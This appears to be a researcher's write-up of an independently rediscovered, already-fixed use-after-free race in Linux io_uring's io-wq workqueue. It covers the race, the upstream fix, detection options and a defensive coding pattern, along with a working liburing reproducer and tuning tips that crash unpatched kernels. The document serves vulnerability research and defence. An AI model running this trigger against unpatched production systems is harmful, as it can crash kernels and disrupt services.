Linux io-wq UAF rediscovery

Use-after-free in io-wq, on the read of wq->hash_tail[index] during worker selection. Already fixed upstream in commit d6a2d7b04b5a. Stable kernels carrying the bug picked up the backport in their corresponding releases.

I rediscovered it independently. Writing it up here as a methodology note plus a working reproducer, not as a vulnerability announcement.

what's broken

io-wq is the workqueue subsystem inside io_uring. It manages a pool of worker threads that pick up async work submitted through SQEs. Hashed work, the kind tagged with IOSQE_ASYNC and bound to a particular hash bucket, gets routed for cache locality: work items with the same hash land on the same worker so caches stay warm across submissions.

The routing relies on wq->hash_tail[], an array on the workqueue, indexed by hash bucket. Each slot holds a pointer to the last work item enqueued for that bucket. On enqueue, io-wq reads hash_tail[bucket] to decide whether to chain the new work after an existing tail (locality preserved) or set up a fresh chain.

The lifetime of the pointer in hash_tail[bucket] is tied to the work item it points to. When that work item is freed, the slot is supposed to be cleared or replaced before any concurrent reader can see the dangling pointer.

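There's a window between the free and the clear where a concurrent enqueue path reads the slot and gets back a pointer into freed slab memory. KASAN marks the freed object as inaccessible in shadow memory and holds it in quarantine for a while, so the next read through the stale pointer is reported at the access. Without KASAN, slab allocators recycle memory quickly under load, so the same read can land on an unrelated live object.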

the race

Two contexts collide.

The teardown path: io_wq_exit_workers runs when a ring is being shut down. It drains outstanding work, frees the io_wq_work objects, and is supposed to clear the corresponding hash_tail slots. The clear is not atomic with respect to the free.

The submit path: io_wq_enqueue, reached via io_queue_iowq from io_req_task_submit, reads hash_tail[bucket] and decides what to do based on whether it sees a tail. If the read returns a freed pointer (because teardown freed the work but hasn't cleared the slot yet), enqueue dereferences it on the chain decision and KASAN trips.

The window is short. Under normal load it almost never opens. To open it reliably you need rapid ring teardown bursts overlapping with hashed work submission on adjacent rings or task_work flushes. The reproducer below structures the workload to maximize that overlap.

what the patch does

Upstream fix d6a2d7b04b5a adds a check that the workqueue slot is live before reading hash_tail. The shape is a load with explicit memory ordering, paired with a release on the teardown side: teardown publishes the invalidation before the free becomes visible, and enqueue refuses to use a hash_tail value if the corresponding bucket has been marked dead.

The result is that the enqueue path either sees a valid pointer (it can deref) or sees the invalid sentinel (it bails to the slow path that does a fresh worker pick). Race window closed.
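The ordering described above can be modeled in userspace with C11 atomics. This is a sketch of the idea only, not the code in d6a2d7b04b5a: struct bucket, its dead flag, and both helper names are hypothetical. It shows the publish-then-free order on the teardown side and the liveness check on the enqueue side.

```c
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdlib.h>

/* Hypothetical model of one hash bucket: a tail pointer plus a liveness flag. */
struct bucket {
    _Atomic(void *) tail;   /* last item queued for this bucket */
    atomic_bool dead;       /* set by teardown before the item is freed */
};

/* Teardown side: clear the slot and publish the invalidation, then free. */
static void bucket_teardown(struct bucket *b)
{
    void *old = atomic_exchange_explicit(&b->tail, NULL, memory_order_relaxed);

    /* Release: a reader that observes dead == true also observes the cleared tail. */
    atomic_store_explicit(&b->dead, true, memory_order_release);
    free(old);
}

/* Enqueue side: returns the tail to chain after, or NULL to take the slow path. */
static void *bucket_tail_if_live(struct bucket *b)
{
    if (atomic_load_explicit(&b->dead, memory_order_acquire))
        return NULL;
    return atomic_load_explicit(&b->tail, memory_order_relaxed);
}
```

The flag alone does not protect a reader that loaded the tail just before teardown ran. Real kernel code would also have to keep the object alive while it is in use, for example with a lock or RCU, and that part is outside this sketch.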

reproduction

Build an affected kernel with KASAN on. Affected kernels are 6.x prior to the d6a2d7b04b5a backport landing in the relevant stable line.

make defconfig
./scripts/config --enable CONFIG_KASAN \
                 --enable CONFIG_KASAN_INLINE \
                 --enable CONFIG_IO_URING \
                 --enable CONFIG_DEBUG_KERNEL
make olddefconfig
make -j"$(nproc)"

CONFIG_KASAN_INLINE gives you inline KASAN checks (faster, larger image) which catch the read at the access site rather than through a function call. Either inline or outline works for repro; inline produces a cleaner backtrace.

The reproducer is a small userspace program. It opens N rings, submits hashed NOP work concurrently from each, then tears them all down in a tight loop to force the teardown path to overlap with the submit path on adjacent rings.

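/* Build: cc -O2 repro.c -o repro -luring */
#include <liburing.h>

#define RINGS 32
#define DEPTH 64

static struct io_uring rings[RINGS];

/* (Re)create every ring. Returns 0 on success, -errno on failure. */
static int init_rings(void)
{
    for (int i = 0; i < RINGS; i++) {
        int ret = io_uring_queue_init(DEPTH, &rings[i], 0);
        if (ret < 0)
            return ret;
    }
    return 0;
}

int main(void)
{
    if (init_rings() < 0)
        return 1;

    for (int round = 0; round < 1000; round++) {
        /* Queue one async-punted NOP per ring. */
        for (int i = 0; i < RINGS; i++) {
            struct io_uring_sqe *sqe = io_uring_get_sqe(&rings[i]);
            if (!sqe)
                continue;
            io_uring_prep_nop(sqe);
            sqe->flags |= IOSQE_ASYNC;
            io_uring_submit(&rings[i]);
        }
        /* Tear every ring down while that work may still be in flight. */
        for (int i = 0; i < RINGS; i++)
            io_uring_queue_exit(&rings[i]);
        if (init_rings() < 0)
            return 1;
    }
    return 0;
}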

Pinning the process to a small CPU set (2 cores is plenty) makes the race more frequent by forcing teardown and submit work to interleave on the same kernel threads. Without pinning you may need several seconds before KASAN trips. With pinning the first round usually does it.
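One way to do the pinning from inside the program is sched_setaffinity. The helper below is a sketch, and pin_to_first_cpus is a hypothetical name rather than part of the original harness. It keeps only the first n CPUs the thread is already allowed to run on, so it still works inside a restricted cpuset.

```c
#define _GNU_SOURCE
#include <sched.h>

/*
 * Restrict the calling thread to the first n CPUs of its current
 * affinity mask. Returns 0 on success, -1 on failure.
 */
static int pin_to_first_cpus(int n)
{
    cpu_set_t allowed, want;

    if (n < 1 || sched_getaffinity(0, sizeof(allowed), &allowed) != 0)
        return -1;

    CPU_ZERO(&want);
    for (int cpu = 0; cpu < CPU_SETSIZE && n > 0; cpu++) {
        if (CPU_ISSET(cpu, &allowed)) {
            CPU_SET(cpu, &want);
            n--;
        }
    }
    return sched_setaffinity(0, sizeof(want), &want);
}
```

Calling pin_to_first_cpus(2) at the top of main, before any rings are created, matches the two-core setup described above. Launching the binary under taskset -c 0,1 should have the same effect without touching the code.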

Under load, KASAN trips on the read of wq->hash_tail[index] in the io-wq worker selection path:

BUG: KASAN: slab-use-after-free in io_wq_enqueue+0x...
Read of size 8 at addr ffff888100abc010 by task repro/...

Call Trace:
  io_wq_enqueue                  // reads wq->hash_tail[bucket]
  io_queue_iowq                  // io_uring submit path
  io_req_task_submit             // task_work flush
  task_work_run
  exit_to_user_mode_loop
  ...

Allocated by task ...:
  kmem_cache_alloc
  io_wq_alloc_work
  ...

Freed by task ...:
  kmem_cache_free
  io_wq_exit_workers             // teardown frees prior tail
  io_wq_put_and_exit
  io_ring_exit_work
  process_one_work
  ...

The annotated frames show the shape: the submit side reader is in io_wq_enqueue, the freer is io_wq_exit_workers running from a different ring's teardown on the worker pool that's about to be reaped.

detection without KASAN

On a production kernel without KASAN compiled in, the bug shows up as a kernel oops or general protection fault on a wild pointer dereference inside the io-wq enqueue path. The crash signature varies because the freed object may still hold its old contents, may have been reused for another allocation, or may carry allocator debug poison.

Workloads that hit this in practice are containerized services with rapid io_uring ring lifecycles: containers that fork, exec, and exit quickly, services that cycle rings on configuration change, and worker pools that recreate the ring per request. Services that hold one ring open for the long term rarely trigger it.

If you operate kernels that aren't yet carrying the d6a2d7b04b5a backport, detection options are:

Crash signature matching on io_wq_enqueue+ frames in syslog with a wild pointer in RSI or RDI.
eBPF kprobe on io_wq_enqueue that validates the hash_tail pointer the function is about to use against the slab cache for io_wq_work. Flag when the pointer is in a freed slab.
Audit metrics on ring teardown rate. The class of services that hit this is the class that tears down rings hundreds of times per second under stress. That's the signal worth alerting on independently of the bug.
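The first option, crash signature matching, can start as a plain substring check over kernel log lines. The sketch below assumes x86-64 oops output where the faulting address appears on a line such as "RIP: 0010:io_wq_enqueue+0x...". That line format and the function name is_iowq_enqueue_fault are assumptions, so adjust the markers to what your logs actually contain.

```c
#include <stdbool.h>
#include <string.h>

/*
 * Returns true if a kernel log line looks like a fault report with
 * io_wq_enqueue at the faulting address. Call-trace lines that only
 * mention io_wq_enqueue are ignored to cut down on false positives.
 */
static bool is_iowq_enqueue_fault(const char *line)
{
    return strstr(line, "RIP:") != NULL &&
           strstr(line, "io_wq_enqueue+") != NULL;
}
```

Feeding it each line read from the kernel log and alerting on the first match is enough for triage. Checking RSI or RDI for a wild pointer would need a second pass over the register dump that follows.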

variants in adjacent code

The pattern is: an element of a pointer array read during enqueue, indexed by a key derived from the work, racing with a teardown path that frees the referenced object. I checked the obvious candidates in io-wq and a couple of places in io_uring outside io-wq after fingerprinting the primary site. Nothing else trips reliably under this harness, but the pattern is worth a grep across any worker pool code: arrays of struct io_wq_work * indexed by hash or bucket, similar arrays in io_uring for request queues and cancel tables.

The lifetime invariant that fails in all of these is the same. The array slot's lifetime is implicitly tied to the object it points to, and concurrent readers don't have a way to verify liveness before deref.

A more robust defense pattern for this class is to wrap the pointer in a tagged or versioned slot: each slot carries a generation counter that the reader can compare against the object's generation. Mismatch means stale, bail to slow path. That's heavier than the liveness check the upstream patch uses, but it's the better pattern if you have to do this in multiple places. The upstream fix took the lighter approach because it was localized to one site.
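A minimal sketch of the versioned-slot idea follows, with all names (struct vslot, struct vhandle, the vslot_* helpers) hypothetical. It is a variation on the description above: the generation lives in the slot and in a handle the reader keeps, rather than in the object, so the staleness check never touches memory that may already be freed. It is a single-threaded model, and concurrent use would need atomics or a lock around the slot.

```c
#include <stddef.h>
#include <stdint.h>

#define NR_SLOTS 8

/* Versioned slot: the generation changes whenever the slot is invalidated. */
struct vslot {
    void *ptr;
    uint32_t gen;
};

/* What a reader keeps instead of a raw pointer. */
struct vhandle {
    unsigned int idx;
    uint32_t gen;
};

static struct vslot slots[NR_SLOTS];

/* Publish ptr in slot idx and return a handle valid until the next invalidate. */
static struct vhandle vslot_publish(unsigned int idx, void *ptr)
{
    slots[idx].ptr = ptr;
    return (struct vhandle){ .idx = idx, .gen = slots[idx].gen };
}

/* Call before freeing the object: clear the pointer and bump the generation. */
static void vslot_invalidate(unsigned int idx)
{
    slots[idx].ptr = NULL;
    slots[idx].gen++;
}

/* Returns the pointer if the handle is still current, else NULL (slow path). */
static void *vslot_get(struct vhandle h)
{
    if (h.idx >= NR_SLOTS || slots[h.idx].gen != h.gen)
        return NULL;
    return slots[h.idx].ptr;
}
```

A handle taken before vslot_invalidate stays stale even after the slot is republished, which is the property a bare pointer array cannot give you.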

what this calibrated

The pipeline surfaced the candidate site from a diff against the upstream io-wq patch series, with no prior knowledge of the fix or its commit message. The same primitive ended up as both the pipeline's candidate and upstream's actual fix target. That match is the calibration data point worth recording.

Time from "this looks like a candidate" to KASAN repro was short. Most of the time went into the harness, not the analysis. Once the workload shape was right (small rings, fast teardown, pinned CPUs), repro was reliable enough to drop into CI.

For a solo operation hunting kernel bugs, the metric that matters is time from candidate to repro. If the pipeline produces candidates faster than they can be harnessed and reproduced, the bottleneck shifts to bench time, which scales with effort more directly than analysis time scales with intuition. This rediscovery suggests the pipeline is operating in the right regime for kernel work.

patch

Upstream fix: d6a2d7b04b5a.